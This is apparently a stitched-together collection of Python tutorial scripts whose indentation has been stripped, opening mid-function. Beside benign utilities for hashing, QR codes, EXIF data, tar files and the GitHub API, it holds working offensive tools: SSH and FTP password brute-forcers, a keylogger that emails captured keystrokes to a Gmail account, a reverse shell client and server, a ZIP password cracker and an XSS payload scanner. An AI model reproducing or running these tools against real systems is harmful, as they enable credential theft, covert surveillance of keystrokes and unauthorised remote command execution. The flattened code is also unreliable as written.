# add to know hosts
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(hostname=hostname, username=username, password=password, timeout=3)
except socket.timeout:
# this is when host is unreachable
print(f"{RED}[!] Host: {hostname} is unreachable, timed out.{RESET}")
return False
except paramiko.AuthenticationException:
print(f"[!] Invalid credentials for {username}:{password}")
return False
except paramiko.SSHException:
print(f"{BLUE}[*] Quota exceeded, retrying with delay...{RESET}")
# sleep for a minute
time.sleep(60)
return is_ssh_open(hostname, username, password)
else:
# connection was established successfully
print(f"{GREEN}[+] Found combo:\n\tHOSTNAME: {hostname}\n\tUSERNAME: {username}\n\tPASSWORD: {password}{RESET}")
return True
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="SSH Bruteforce Python script.")
parser.add_argument("host", help="Hostname or IP Address of SSH Server to bruteforce.")
parser.add_argument("-P", "--passlist", help="File that contain password list in each line.")
parser.add_argument("-u", "--user", help="Host username.")
# parse passed arguments
args = parser.parse_args()
host = args.host
passlist = args.passlist
user = args.user
# read the file
passlist = open(passlist).read().splitlines()
# brute-force
for password in passlist:
if is_ssh_open(host, user, password):
# if combo is valid, save it to a file
open("credentials.txt", "w").write(f"{user}{host}:{password}")
break
from cryptography.fernet import Fernet
import os
def write_key():
"""
Generates a key and save it into a file
"""
key = Fernet.generate_key()
with open("key.key", "wb") as key_file:
key_file.write(key)
def load_key():
"""
Loads the key from the current directory named key.key
"""
return open("key.key", "rb").read()
def encrypt(filename, key):
"""
Given a filename (str) and key (bytes), it encrypts the file and write it
"""
f = Fernet(key)
with open(filename, "rb") as file:
# read all file data
file_data = file.read()
# encrypt data
encrypted_data = f.encrypt(file_data)
# write the encrypted file
with open(filename, "wb") as file:
file.write(encrypted_data)
def decrypt(filename, key):
"""
Given a filename (str) and key (bytes), it decrypts the file and write it
"""
f = Fernet(key)
with open(filename, "rb") as file:
# read the encrypted data
encrypted_data = file.read()
# decrypt data
decrypted_data = f.decrypt(encrypted_data)
# write the original file
with open(filename, "wb") as file:
file.write(decrypted_data)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Simple File Encryptor Script")
parser.add_argument("file", help="File to encrypt/decrypt")
parser.add_argument("-g", "--generate-key", dest="generate_key", action="store_true",
help="Whether to generate a new key or use existing")
parser.add_argument("-e", "--encrypt", action="store_true",
help="Whether to encrypt the file, only -e or -d can be specified.")
parser.add_argument("-d", "--decrypt", action="store_true",
help="Whether to decrypt the file, only -e or -d can be specified.")
args = parser.parse_args()
file = args.file
generate_key = args.generate_key
if generate_key:
write_key()
# load the key
key = load_key()
encrypt_ = args.encrypt
decrypt_ = args.decrypt
if encrypt_ and decrypt_:
raise TypeError("Please specify whether you want to encrypt the file or decrypt it.")
elif encrypt_:
encrypt(file, key)
elif decrypt_:
decrypt(file, key)
else:
raise TypeError("Please specify whether you want to encrypt the file or decrypt it.")
import ftplib
from threading import Thread
import queue
from colorama import Fore, init # for fancy colors, nothing else
# init the console for colors (for Windows)
# init()
# initialize the queue
q = queue.Queue()
# port of FTP, aka 21
port = 21
def connect_ftp():
global q
while True:
# get the password from the queue
password = q.get()
# initialize the FTP server object
server = ftplib.FTP()
print("[!] Trying", password)
try:
# tries to connect to FTP server with a timeout of 5
server.connect(host, port, timeout=5)
# login using the credentials (user & password)
server.login(user, password)
except ftplib.error_perm:
# login failed, wrong credentials
pass
else:
# correct credentials
print(f"{Fore.GREEN}[+] Found credentials: ")
print(f"\tHost: {host}")
print(f"\tUser: {user}")
print(f"\tPassword: {password}{Fore.RESET}")
# we found the password, let's clear the queue
with q.mutex:
q.queue.clear()
q.all_tasks_done.notify_all()
q.unfinished_tasks = 0
finally:
# notify the queue that the task is completed for this password
q.task_done()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="FTP Cracker made with Python")
parser.add_argument("host", help="The target host or IP address of the FTP server")
parser.add_argument("-u", "--user", help="The username of target FTP server")
parser.add_argument("-p", "--passlist", help="The path of the pass list")
parser.add_argument("-t", "--threads", help="Number of workers to spawn for logining, default is 30", default=30)
args = parser.parse_args()
# hostname or IP address of the FTP server
host = args.host
# username of the FTP server, root as default for linux
user = args.user
passlist = args.passlist
# number of threads to spawn
n_threads = args.threads
# read the wordlist of passwords
passwords = open(passlist).read().split("\n")
print("[+] Passwords to try:", len(passwords))
# put all passwords to the queue
for password in passwords:
q.put(password)
# create n_threads that runs that function
for t in range(n_threads):
thread = Thread(target=connect_ftp)
# will end when the main thread end
thread.daemon = True
thread.start()
# wait for the queue to be empty
q.join()
import ftplib
from colorama import Fore, init # for fancy colors, nothing else
# init the console for colors (for Windows)
init()
# hostname or IP address of the FTP server
host = "192.168.1.113"
# username of the FTP server, root as default for linux
user = "test"
# port of FTP, aka 21
port = 21
def is_correct(password):
# initialize the FTP server object
server = ftplib.FTP()
print(f"[!] Trying", password)
try:
# tries to connect to FTP server with a timeout of 5
server.connect(host, port, timeout=5)
# login using the credentials (user & password)
server.login(user, password)
except ftplib.error_perm:
# login failed, wrong credentials
return False
else:
# correct credentials
print(f"{Fore.GREEN}[+] Found credentials:", password, Fore.RESET)
return True
# read the wordlist of passwords
passwords = open("wordlist.txt").read().split("\n")
print("[+] Passwords to try:", len(passwords))
# iterate over passwords one by one
# if the password is found, break out of the loop
for password in passwords:
if is_correct(password):
break
import hashlib
import sys
def read_file(file):
"""Reads en entire file and returns file bytes."""
BUFFER_SIZE = 16384 # 16 kilo bytes
b = b""
with open(file, "rb") as f:
while True:
# read 16K bytes from the file
bytes_read = f.read(BUFFER_SIZE)
if bytes_read:
# if there is bytes, append them
b += bytes_read
else:
# if not, nothing to do here, break out of the loop
break
return b
if __name__ == "__main__":
# read some file
file_content = read_file(sys.argv[1])
# some chksums:
# hash with MD5 (not recommended)
print("MD5:", hashlib.md5(file_content).hexdigest())
# hash with SHA-2 (SHA-256 & SHA-512)
print("SHA-256:", hashlib.sha256(file_content).hexdigest())
print("SHA-512:", hashlib.sha512(file_content).hexdigest())
# hash with SHA-3
print("SHA-3-256:", hashlib.sha3_256(file_content).hexdigest())
print("SHA-3-512:", hashlib.sha3_512(file_content).hexdigest())
# hash with BLAKE2
# 256-bit BLAKE2 (or BLAKE2s)
print("BLAKE2c:", hashlib.blake2s(file_content).hexdigest())
# 512-bit BLAKE2 (or BLAKE2b)
print("BLAKE2b:", hashlib.blake2b(file_content).hexdigest())
import hashlib
# encode it to bytes using UTF-8 encoding
message = "Some text to hash".encode()
# hash with MD5 (not recommended)
print("MD5:", hashlib.md5(message).hexdigest())
# hash with SHA-2 (SHA-256 & SHA-512)
print("SHA-256:", hashlib.sha256(message).hexdigest())
print("SHA-512:", hashlib.sha512(message).hexdigest())
# hash with SHA-3
print("SHA-3-256:", hashlib.sha3_256(message).hexdigest())
print("SHA-3-512:", hashlib.sha3_512(message).hexdigest())
# hash with BLAKE2
# 256-bit BLAKE2 (or BLAKE2s)
print("BLAKE2c:", hashlib.blake2s(message).hexdigest())
# 512-bit BLAKE2 (or BLAKE2b)
print("BLAKE2b:", hashlib.blake2b(message).hexdigest())
from PIL import Image
from PIL.ExifTags import TAGS
import sys
# path to the image or video
imagename = sys.argv[1]
# read the image data using PIL
image = Image.open(imagename)
# extract EXIF data
exifdata = image.getexif()
# iterating over all EXIF data fields
for tag_id in exifdata:
# get the tag name, instead of human unreadable tag id
tag = TAGS.get(tag_id, tag_id)
data = exifdata.get(tag_id)
# decode bytes
if isinstance(data, bytes):
data = data.decode()
print(f"{tag:25}: {data}")
import keyboard # for keylogs
import smtplib # for sending email using SMTP protocol (gmail)
# Semaphore is for blocking the current thread
# Timer is to make a method runs after an interval amount of time
from threading import Semaphore, Timer
SEND_REPORT_EVERY = 600 # 10 minutes
EMAIL_ADDRESS = "put_real_address_heregmail.com"
EMAIL_PASSWORD = "put_real_pw"
class Keylogger:
def __init__(self, interval):
# we gonna pass SEND_REPORT_EVERY to interval
self.interval = interval
# this is the string variable that contains the log of all
# the keystrokes within self.interval
self.log = ""
# for blocking after setting the on_release listener
self.semaphore = Semaphore(0)
def callback(self, event):
"""
This callback is invoked whenever a keyboard event is occured
(i.e when a key is released in this example)
"""
name = event.name
if len(name) > 1:
# not a character, special key (e.g ctrl, alt, etc.)
# uppercase with []
if name == "space":
# " " instead of "space"
name = " "
elif name == "enter":
# add a new line whenever an ENTER is pressed
name = "[ENTER]\n"
elif name == "decimal":
name = "."
else:
# replace spaces with underscores
name = name.replace(" ", "_")
name = f"[{name.upper()}]"
self.log += name
def sendmail(self, email, password, message):
# manages a connection to an SMTP server
server = smtplib.SMTP(host="smtp.gmail.com", port=587)
# connect to the SMTP server as TLS mode ( for security )
server.starttls()
# login to the email account
server.login(email, password)
# send the actual message
server.sendmail(email, email, message)
# terminates the session
server.quit()
def report(self):
"""
This function gets called every self.interval
It basically sends keylogs and resets self.log variable
"""
if self.log:
# if there is something in log, report it
self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log)
# can print to a file, whatever you want
# print(self.log)
self.log = ""
Timer(interval=self.interval, function=self.report).start()
def start(self):
# start the keylogger
keyboard.on_release(callback=self.callback)
# start reporting the keylogs
self.report()
# block the current thread,
# since on_release() doesn't block the current thread
# if we don't block it, when we execute the program, nothing will happen
# that is because on_release() will start the listener in a separate thread
self.semaphore.acquire()
if __name__ == "__main__":
keylogger = Keylogger(interval=SEND_REPORT_EVERY)
keylogger.start()
import argparse
import socket # for connecting
from colorama import init, Fore
from threading import Thread, Lock
from queue import Queue
# some colors
init()
GREEN = Fore.GREEN
RESET = Fore.RESET
GRAY = Fore.LIGHTBLACK_EX
# number of threads, feel free to tune this parameter as you wish
N_THREADS = 200
# thread queue
q = Queue()
print_lock = Lock()
def port_scan(port):
"""
Scan a port on the global variable host
"""
try:
s = socket.socket()
s.connect((host, port))
except:
with print_lock:
print(f"{GRAY}{host:15}:{port:5} is closed {RESET}", end='\r')
else:
with print_lock:
print(f"{GREEN}{host:15}:{port:5} is open {RESET}")
finally:
s.close()
def scan_thread():
global q
while True:
# get the port number from the queue
worker = q.get()
# scan that port number
port_scan(worker)
# tells the queue that the scanning for that port
# is done
q.task_done()
def main(host, ports):
global q
for t in range(N_THREADS):
# for each thread, start it
t = Thread(target=scan_thread)
# when we set daemon to true, that thread will end when the main thread ends
t.daemon = True
# start the daemon thread
t.start()
for worker in ports:
# for each port, put that port into the queue
# to start scanning
q.put(worker)
# wait the threads ( port scanners ) to finish
q.join()
if __name__ == "__main__":
# parse some parameters passed
parser = argparse.ArgumentParser(description="Simple port scanner")
parser.add_argument("host", help="Host to scan.")
parser.add_argument("--ports", "-p", dest="port_range", default="1-65535", help="Port range to scan, default is 1-65535 (all ports)")
args = parser.parse_args()
host, port_range = args.host, args.port_range
start_port, end_port = port_range.split("-")
start_port, end_port = int(start_port), int(end_port)
ports = [ p for p in range(start_port, end_port)]
main(host, ports)
import socket # for connecting
from colorama import init, Fore
# some colors
init()
GREEN = Fore.GREEN
RESET = Fore.RESET
GRAY = Fore.LIGHTBLACK_EX
def is_port_open(host, port):
"""
determine whether host has the port open
"""
# creates a new socket
s = socket.socket()
try:
# tries to connect to host using that port
s.connect((host, port))
# make timeout if you want it a little faster ( less accuracy )
s.settimeout(0.2)
except:
# cannot connect, port is closed
# return false
return False
else:
# the connection was established, port is open!
return True
# get the host from the user
host = input("Enter the host:")
# iterate over ports, from 1 to 1024
for port in range(1, 1025):
if is_port_open(host, port):
print(f"{GREEN}[+] {host}:{port} is open {RESET}")
else:
print(f"{GRAY}[!] {host}:{port} is closed {RESET}", end="\r")
import socket
import subprocess
import sys
SERVER_HOST = sys.argv[1]
SERVER_PORT = 5003
BUFFER_SIZE = 1024
# create the socket object
s = socket.socket()
# connect to the server
s.connect((SERVER_HOST, SERVER_PORT))
# receive the greeting message
message = s.recv(BUFFER_SIZE).decode()
print("Server:", message)
while True:
# receive the command from the server
command = s.recv(BUFFER_SIZE).decode()
if command.lower() == "exit":
# if the command is exit, just break out of the loop
break
# execute the command and retrieve the results
output = subprocess.getoutput(command)
# send the results back to the server
s.send(output.encode())
# close client connection
s.close()
import socket
SERVER_HOST = "0.0.0.0"
SERVER_PORT = 5003
BUFFER_SIZE = 1024
# create a socket object
s = socket.socket()
# bind the socket to all IP addresses of this host
s.bind((SERVER_HOST, SERVER_PORT))
# make the PORT reusable
# when you run the server multiple times in Linux, Address already in use error will raise
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.listen(5)
print(f"Listening as {SERVER_HOST}:{SERVER_PORT} ...")
# accept any connections attempted
client_socket, client_address = s.accept()
print(f"{client_address[0]}:{client_address[1]} Connected!")
# just sending a message, for demonstration purposes
message = "Hello and Welcome".encode()
client_socket.send(message)
while True:
# get the command from prompt
command = input("Enter the command you wanna execute:")
# send the command to the client
client_socket.send(command.encode())
if command.lower() == "exit":
# if the command is exit, just break out of the loop
break
# retrieve command results
results = client_socket.recv(BUFFER_SIZE).decode()
# print them
print(results)
# close connection to the client
client_socket.close()
# close server connection
s.close()
import cv2
import numpy as np
import os
def to_bin(data):
"""Convert data to binary format as string"""
if isinstance(data, str):
return ''.join([ format(ord(i), "08b") for i in data ])
elif isinstance(data, bytes) or isinstance(data, np.ndarray):
return [ format(i, "08b") for i in data ]
elif isinstance(data, int) or isinstance(data, np.uint8):
return format(data, "08b")
else:
raise TypeError("Type not supported.")
def encode(image_name, secret_data):
# read the image
image = cv2.imread(image_name)
# maximum bytes to encode
n_bytes = image.shape[0] * image.shape[1] * 3 // 8
print("[*] Maximum bytes to encode:", n_bytes)
if len(secret_data) > n_bytes:
raise ValueError("[!] Insufficient bytes, need bigger image or less data.")
print("[*] Encoding data...")
# add stopping criteria
secret_data += "====="
data_index = 0
# convert data to binary
binary_secret_data = to_bin(secret_data)
# size of data to hide
data_len = len(binary_secret_data)
for row in image:
for pixel in row:
# convert RGB values to binary format
r, g, b = to_bin(pixel)
# modify the least significant bit only if there is still data to store
if data_index < data_len:
# least significant red pixel bit
pixel[0] = int(r[:-1] + binary_secret_data[data_index], 2)
data_index += 1
if data_index < data_len:
# least significant green pixel bit
pixel[1] = int(g[:-1] + binary_secret_data[data_index], 2)
data_index += 1
if data_index < data_len:
# least significant blue pixel bit
pixel[2] = int(b[:-1] + binary_secret_data[data_index], 2)
data_index += 1
# if data is encoded, just break out of the loop
if data_index >= data_len:
break
return image
def decode(image_name):
print("[+] Decoding...")
# read the image
image = cv2.imread(image_name)
binary_data = ""
for row in image:
for pixel in row:
r, g, b = to_bin(pixel)
binary_data += r[-1]
binary_data += g[-1]
binary_data += b[-1]
# split by 8-bits
all_bytes = [ binary_data[i: i+8] for i in range(0, len(binary_data), 8) ]
# convert from bits to characters
decoded_data = ""
for byte in all_bytes:
decoded_data += chr(int(byte, 2))
if decoded_data[-5:] == "=====":
break
return decoded_data[:-5]
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Steganography encoder/decoder, this Python scripts encode data within images.")
parser.add_argument("-t", "--text", help="The text data to encode into the image, this only should be specified for encoding")
parser.add_argument("-e", "--encode", help="Encode the following image")
parser.add_argument("-d", "--decode", help="Decode the following image")
args = parser.parse_args()
secret_data = args.text
if args.encode:
# if the encode argument is specified
input_image = args.encode
print("input_image:", input_image)
# split the absolute path and the file
path, file = os.path.split(input_image)
# split the filename and the image extension
filename, ext = file.split(".")
output_image = os.path.join(path, f"{filename}_encoded.{ext}")
# encode the data into the image
encoded_image = encode(image_name=input_image, secret_data=secret_data)
# save the output image (encoded image)
cv2.imwrite(output_image, encoded_image)
print("[+] Saved encoded image.")
if args.decode:
input_image = args.decode
# decode the secret data from the image
decoded_data = decode(input_image)
print("[+] Decoded data:", decoded_data)
import requests
from threading import Thread
from queue import Queue
q = Queue()
def scan_subdomains(domain):
global q
while True:
# get the subdomain from the queue
subdomain = q.get()
# scan the subdomain
url = f"http://{subdomain}.{domain}"
try:
requests.get(url)
except requests.ConnectionError:
pass
else:
print("[+] Discovered subdomain:", url)
# we're done with scanning that subdomain
q.task_done()
def main(domain, n_threads, subdomains):
global q
# fill the queue with all the subdomains
for subdomain in subdomains:
q.put(subdomain)
for t in range(n_threads):
# start all threads
worker = Thread(target=scan_subdomains, args=(domain,))
# daemon thread means a thread that will end when the main thread ends
worker.daemon = True
worker.start()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Faster Subdomain Scanner using Threads")
parser.add_argument("domain", help="Domain to scan for subdomains without protocol (e.g without 'http://' or 'https://')")
parser.add_argument("-l", "--wordlist", help="File that contains all subdomains to scan, line by line. Default is subdomains.txt",
default="subdomains.txt")
parser.add_argument("-t", "--num-threads", help="Number of threads to use to scan the domain. Default is 10", default=10, type=int)
args = parser.parse_args()
domain = args.domain
wordlist = args.wordlist
num_threads = args.num_threads
main(domain=domain, n_threads=num_threads, subdomains=open(wordlist).read().splitlines())
q.join()
import requests
# the domain to scan for subdomains
domain = "google.com"
# read all subdomains
file = open("subdomains.txt")
# read all content
content = file.read()
# split by new lines
subdomains = content.splitlines()
for subdomain in subdomains:
# construct the url
url = f"http://{subdomain}.{domain}"
try:
# if this raises an ERROR, that means the subdomain does not exist
requests.get(url)
except requests.ConnectionError:
# if the subdomain does not exist, just pass, print nothing
pass
else:
print("[+] Discovered subdomain:", url)
import requests
from pprint import pprint
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin
def get_all_forms(url):
"""Given a url, it returns all forms from the HTML content"""
soup = bs(requests.get(url).content, "html.parser")
return soup.find_all("form")
def get_form_details(form):
"""
This function extracts all possible useful information about an HTML form
"""
details = {}
# get the form action (target url)
action = form.attrs.get("action").lower()
# get the form method (POST, GET, etc.)
method = form.attrs.get("method", "get").lower()
# get all the input details such as type and name
inputs = []
for input_tag in form.find_all("input"):
input_type = input_tag.attrs.get("type", "text")
input_name = input_tag.attrs.get("name")
inputs.append({"type": input_type, "name": input_name})
# put everything to the resulting dictionary
details["action"] = action
details["method"] = method
details["inputs"] = inputs
return details
def submit_form(form_details, url, value):
"""
Submits a form given in form_details
Params:
form_details (list): a dictionary that contain form information
url (str): the original URL that contain that form
value (str): this will be replaced to all text and search inputs
Returns the HTTP Response after form submission
"""
# construct the full URL (if the url provided in action is relative)
target_url = urljoin(url, form_details["action"])
# get the inputs
inputs = form_details["inputs"]
data = {}
for input in inputs:
# replace all text and search values with value
if input["type"] == "text" or input["type"] == "search":
input["value"] = value
input_name = input.get("name")
input_value = input.get("value")
if input_name and input_value:
# if input name and value are not None,
# then add them to the data of form submission
data[input_name] = input_value
if form_details["method"] == "post":
return requests.post(target_url, data=data)
else:
# GET request
return requests.get(target_url, params=data)
def scan_xss(url):
"""
Given a url, it prints all XSS vulnerable forms and
returns True if any is vulnerable, False otherwise
"""
# get all the forms from the URL
forms = get_all_forms(url)
print(f"[+] Detected {len(forms)} forms on {url}.")
js_script = "<Script>alert('hi')</scripT>"
# returning value
is_vulnerable = False
# iterate over all forms
for form in forms:
form_details = get_form_details(form)
content = submit_form(form_details, url, js_script).content.decode()
if js_script in content:
print(f"[+] XSS Detected on {url}")
print(f"[*] Form details:")
pprint(form_details)
is_vulnerable = True
# won't break because we want to print other available vulnerable forms
return is_vulnerable
if __name__ == "__main__":
import sys
url = sys.argv[1]
print(scan_xss(url))
from tqdm import tqdm
import zipfile
import sys
# the password list path you want to use
wordlist = sys.argv[2]
# the zip file you want to crack its password
zip_file = sys.argv[1]
# initialize the Zip File object
zip_file = zipfile.ZipFile(zip_file)
# count the number of words in this wordlist
n_words = len(list(open(wordlist, "rb")))
# print the total number of passwords
print("Total passwords to test:", n_words)
with open(wordlist, "rb") as wordlist:
for word in tqdm(wordlist, total=n_words, unit="word"):
try:
zip_file.extractall(pwd=word.strip())
except:
continue
else:
print("[+] Password found:", word.decode().strip())
exit(0)
print("[!] Password not found, try other wordlist.")
import requests
from pprint import pprint
# email and password
auth = ("emailexample.com", "ffffffff")
# get the HTTP Response
res = requests.get("https://secure.veesp.com/api/details", auth=auth)
# get the account details
account_details = res.json()
pprint(account_details)
# get the bought services
services = requests.get('https://secure.veesp.com/api/service', auth=auth).json()
pprint(services)
# get the upgrade options
upgrade_options = requests.get('https://secure.veesp.com/api/service/32723/upgrade', auth=auth).json()
pprint(upgrade_options)
# list all bought VMs
all_vms = requests.get("https://secure.veesp.com/api/service/32723/vms", auth=auth).json()
pprint(all_vms)
# stop a VM automatically
stopped = requests.post("https://secure.veesp.com/api/service/32723/vms/18867/stop", auth=auth).json()
print(stopped)
# {'status': True}
# start it again
started = requests.post("https://secure.veesp.com/api/service/32723/vms/18867/start", auth=auth).json()
print(started)
# {'status': True}
import os
import matplotlib.pyplot as plt
def get_size_format(b, factor=1024, suffix="B"):
"""
Scale bytes to its proper byte format
e.g:
1253656 => '1.20MB'
1253656678 => '1.17GB'
"""
for unit in ["", "K", "M", "G", "T", "P", "E", "Z"]:
if b < factor:
return f"{b:.2f}{unit}{suffix}"
b /= factor
return f"{b:.2f}Y{suffix}"
def get_directory_size(directory):
"""Returns the directory size in bytes."""
total = 0
try:
# print("[+] Getting the size of", directory)
for entry in os.scandir(directory):
if entry.is_file():
# if it's a file, use stat() function
total += entry.stat().st_size
elif entry.is_dir():
# if it's a directory, recursively call this function
total += get_directory_size(entry.path)
except NotADirectoryError:
# if directory isn't a directory, get the file size then
return os.path.getsize(directory)
except PermissionError:
# if for whatever reason we can't open the folder, return 0
return 0
return total
def plot_pie(sizes, names):
"""Plots a pie where sizes is the wedge sizes and names """
plt.pie(sizes, labels=names, autopct=lambda pct: f"{pct:.2f}%")
plt.title("Different Sub-directory sizes in bytes")
plt.show()
if __name__ == "__main__":
import sys
folder_path = sys.argv[1]
directory_sizes = []
names = []
# iterate over all the directories inside this path
for directory in os.listdir(folder_path):
directory = os.path.join(folder_path, directory)
# get the size of this directory (folder)
directory_size = get_directory_size(directory)
if directory_size == 0:
continue
directory_sizes.append(directory_size)
names.append(os.path.basename(directory) + ": " + get_size_format(directory_size))
print("[+] Total directory size:", get_size_format(sum(directory_sizes)))
plot_pie(directory_sizes, names)
import tarfile
from tqdm import tqdm # pip3 install tqdm
def decompress(tar_file, path, members=None):
"""
Extracts tar_file and puts the members to path.
If members is None, all members on tar_file will be extracted.
"""
tar = tarfile.open(tar_file, mode="r:gz")
if members is None:
members = tar.getmembers()
# with progress bar
# set the progress bar
progress = tqdm(members)
for member in progress:
tar.extract(member, path=path)
# set the progress description of the progress bar
progress.set_description(f"Extracting {member.name}")
# or use this
# tar.extractall(members=members, path=path)
# close the file
tar.close()
def compress(tar_file, members):
"""
Adds files (members) to a tar_file and compress it
"""
# open file for gzip compressed writing
tar = tarfile.open(tar_file, mode="w:gz")
# with progress bar
# set the progress bar
progress = tqdm(members)
for member in progress:
# add file/folder/link to the tar file (compress)
tar.add(member)
# set the progress description of the progress bar
progress.set_description(f"Compressing {member}")
# close the file
tar.close()
# compress("compressed.tar.gz", ["test.txt", "test_folder"])
# decompress("compressed.tar.gz", "extracted")
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="TAR file compression/decompression using GZIP.")
parser.add_argument("method", help="What to do, either 'compress' or 'decompress'")
parser.add_argument("-t", "--tarfile", help="TAR file to compress/decompress, if it isn't specified for compression, the new TAR file will be named after the first file to compress.")
parser.add_argument("-p", "--path", help="The folder to compress into, this is only for decompression. Default is '.' (the current directory)", default="")
parser.add_argument("-f", "--files", help="File(s),Folder(s),Link(s) to compress/decompress separated by ','.")
args = parser.parse_args()
method = args.method
tar_file = args.tarfile
path = args.path
files = args.files
# split by ',' to convert into a list
files = files.split(",") if isinstance(files, str) else None
if method.lower() == "compress":
if not files:
print("Files to compress not provided, exiting...")
exit(1)
elif not tar_file:
# take the name of the first file
tar_file = f"{files[0]}.tar.gz"
compress(tar_file, files)
elif method.lower() == "decompress":
if not tar_file:
print("TAR file to decompress is not provided, nothing to do, exiting...")
exit(2)
decompress(tar_file, path, files)
else:
print("Method not known, please use 'compress/decompress'.")
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.audio import MIME
# your credentials
email = "emailexample.com"
password = "password"
# the sender's email
FROM = "emailexample.com"
# the receiver's email
TO = "toexample.com"
# the subject of the email (subject)
subject = "Just a subject"
# initialize the message we wanna send
msg = MIMEMultipart()
# set the sender's email
msg["From"] = FROM
# set the receiver's email
msg["To"] = TO
# set the subject
msg["Subject"] = subject
# set the body of the email
text = MIMEText("This email is sent using <b>Python</b> !", "html")
# attach this body to the email
msg.attach(text)
# initialize the SMTP server
server = smtplib.SMTP("smtp.gmail.com", 587)
# connect to the SMTP server as TLS mode (secure) and send EHLO
server.starttls()
# login to the account using the credentials
server.login(email, password)
# send the email
server.sendmail(FROM, TO, msg.as_string())
# terminate the SMTP session
server.quit()
import paramiko
import argparse
parser = argparse.ArgumentParser(description="Python script to execute BASH scripts on Linux boxes remotely.")
parser.add_argument("host", help="IP or domain of SSH Server")
parser.add_argument("-u", "--user", required=True, help="The username you want to access to.")
parser.add_argument("-p", "--password", required=True, help="The password of that user")
parser.add_argument("-b", "--bash", required=True, help="The BASH script you wanna execute")
args = parser.parse_args()
hostname = args.host
username = args.user
password = args.password
bash_script = args.bash
# initialize the SSH client
client = paramiko.SSHClient()
# add to known hosts
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(hostname=hostname, username=username, password=password)
except:
print("[!] Cannot connect to the SSH Server")
exit()
# read the BASH script content from the file
bash_script = open(bash_script).read()
# execute the BASH script
stdin, stdout, stderr = client.exec_command(bash_script)
# read the standard output and print it
print(stdout.read().decode())
# print errors if there are any
err = stderr.read().decode()
if err:
print(err)
# close the connection
client.close()
import paramiko
hostname = "192.168.1.101"
username = "test"
password = "abc123"
commands = [
"pwd",
"id",
"uname -a",
"df -h"
]
# initialize the SSH client
client = paramiko.SSHClient()
# add to known hosts
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(hostname=hostname, username=username, password=password)
except:
print("[!] Cannot connect to the SSH Server")
exit()
# execute the commands
for command in commands:
print("="*50, command, "="*50)
stdin, stdout, stderr = client.exec_command(command)
print(stdout.read().decode())
err = stderr.read().decode()
if err:
print(err)
client.close()
from tqdm import tqdm
import requests
import sys
# the url of file you want to download, passed from command line arguments
url = sys.argv[1]
# read 1024 bytes every time
buffer_size = 1024
# download the body of response by chunk, not immediately
response = requests.get(url, stream=True)
# get the total file size
file_size = int(response.headers.get("Content-Length", 0))
# get the file name
filename = url.split("/")[-1]
# progress bar, changing the unit to bytes instead of iteration (default by tqdm)
progress = tqdm(response.iter_content(buffer_size), f"Downloading {filename}", total=file_size, unit="B", unit_scale=True, unit_divisor=1024)
with open(filename, "wb") as f:
for data in progress:
# write data read to the file
f.write(data)
# update the progress bar manually
progress.update(len(data))
import qrcode
import sys
data = sys.argv[1]
filename = sys.argv[2]
# generate qr code
img = qrcode.make(data)
# save img to a file
img.save(filename)
import cv2
import sys
filename = sys.argv[1]
# read the QRCODE image
img = cv2.imread(filename)
# initialize the cv2 QRCode detector
detector = cv2.QRCodeDetector()
# detect and decode
data, bbox, straight_qrcode = detector.detectAndDecode(img)
# if there is a QR code
if bbox is not None:
print(f"QRCode data:\n{data}")
# display the image with lines
# length of bounding box
n_lines = len(bbox)
for i in range(n_lines):
# draw all lines
point1 = tuple(bbox[i][0])
point2 = tuple(bbox[(i+1) % n_lines][0])
cv2.line(img, point1, point2, color=(255, 0, 0), thickness=2)
# display the result
cv2.imshow("img", img)
cv2.waitKey(0)
cv2.destroyAllWindows()
import cv2
# initalize the cam
cap = cv2.VideoCapture(0)
# initialize the cv2 QRCode detector
detector = cv2.QRCodeDetector()
while True:
_, img = cap.read()
# detect and decode
data, bbox, _ = detector.detectAndDecode(img)
# check if there is a QRCode in the image
if bbox is not None:
# display the image with lines
for i in range(len(bbox)):
# draw all lines
cv2.line(img, tuple(bbox[i][0]), tuple(bbox[(i+1) % len(bbox)][0]), color=(255, 0, 0), thickness=2)
if data:
print("[+] QR Code detected, data:", data)
# display the result
cv2.imshow("img", img)
if cv2.waitKey(1) == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
from github import Github
# your github account credentials
username = "username"
password = "password"
# initialize github object
g = Github(username, password)
# searching for my repository
repo = g.search_repositories("pythoncode tutorials")[0]
# create a file and commit n push
repo.create_file("test.txt", "commit message", "content of the file")
# delete that created file
contents = repo.get_contents("test.txt")
repo.delete_file(contents.path, "remove test.txt", contents.sha)
import requests
from pprint import pprint
# github username
username = "x4nth055"
# url to request
url = f"https://api.github.com/users/{username}"
# make the request and return the json
user_data = requests.get(url).json()
# pretty print JSON data
pprint(user_data)
# get name
name = user_data["name"]
# get blog url if there is
blog = user_data["blog"]
# extract location
location = user_data["location"]
# get email address that is publicly available
email = user_data["email"]
# number of public repositories
public_repos = user_data["public_repos"]
# get number of public gists
public_gists = user_data["public_gists"]
# number of followers
followers = user_data["followers"]
# number of following
following = user_data["following"]
# date of account creation
date_created = user_data["created_at"]
# date of account last update
date_updated = user_data["updated_at"]
# urls
followers_url = user_data["followers_url"]
following_url = user_data["following_url"]
# print all
print("User:", username)
print("Name:", name)
print("Blog:", blog)
print("Location:", location)
print("Email:", email)
print("Total Public repositories:", public_repos)
print("Total Public Gists:", public_gists)
print("Total followers:", followers)
print("Total following:", following)
print("Date Created:", date_created)
print("Date Updated:", date_updated)
import base64
from github import Github
import sys
def print_repo(repo):
# repository full name
print("Full name:", repo.full_name)
# repository description
print("Description:", repo.description)
# the date of when the repo was created
print("Date created:", repo.created_at)
# the date of the last git push
print("Date of last push:", repo.pushed_at)
# home website (if available)
print("Home Page:", repo.homepage)
# programming language
print("Language:", repo.language)
# number of forks
print("Number of forks:", repo.forks)
